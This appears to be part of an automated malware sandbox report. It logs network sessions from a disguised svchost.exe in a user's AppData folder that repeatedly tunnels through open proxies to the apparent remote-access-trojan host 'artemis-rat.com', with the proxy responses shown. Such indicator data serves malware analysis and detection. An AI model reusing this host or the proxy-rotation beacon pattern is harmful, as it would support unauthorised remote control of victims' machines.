                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2198192.168.2.556884150.109.243.1561567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.130656958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2199192.168.2.556912160.16.90.35312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.135351896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833374023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.334989071 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:31.217138052 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2200192.168.2.55691845.124.113.6950043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.138879061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880188942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880471945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.816000938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.640460014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2201192.168.2.556935211.222.252.187819743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.143723011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2202192.168.2.556902185.158.114.142569743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.148824930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2203192.168.2.556895120.76.42.209888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.151160002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2204192.168.2.55688336.95.13.18567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.151274920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2205192.168.2.555793148.72.206.2503570343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.155010939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333092928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.334084988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2206192.168.2.556904114.132.202.78808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.155500889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880320072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880517006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.573137999 CET84INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Transfer-Encoding: chunked


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2207192.168.2.55696260.246.122.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.166073084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2208192.168.2.555768190.239.220.699943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.173748970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.177047968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.779622078 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2209192.168.2.556928185.219.133.106312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.182873011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.528609037 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2210192.168.2.55696751.20.50.149312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.191104889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.545476913 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2211192.168.2.556978173.249.29.243912343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.192162991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.506654024 CET536INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/3.5.27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3832
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2212192.168.2.55696145.138.87.238108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.197554111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2213192.168.2.556979128.199.221.91800443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.237677097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.942714930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2214192.168.2.555688128.199.221.91717643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.238253117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.974098921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2215192.168.2.55584845.120.178.197108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.240248919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2216192.168.2.557014142.54.239.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.244441032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2217192.168.2.557046104.25.135.1708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.246469021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.400892973 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2218192.168.2.556974103.83.232.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.250709057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.672576904 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2219192.168.2.557049188.114.99.378043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.254894972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.409230947 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2220192.168.2.55704834.49.208.2218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.265149117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2221192.168.2.55696389.218.8.152108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.265636921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2222192.168.2.556991113.208.119.142900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.266597986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.638181925 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2223192.168.2.557080104.21.124.1218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.278389931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.432972908 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
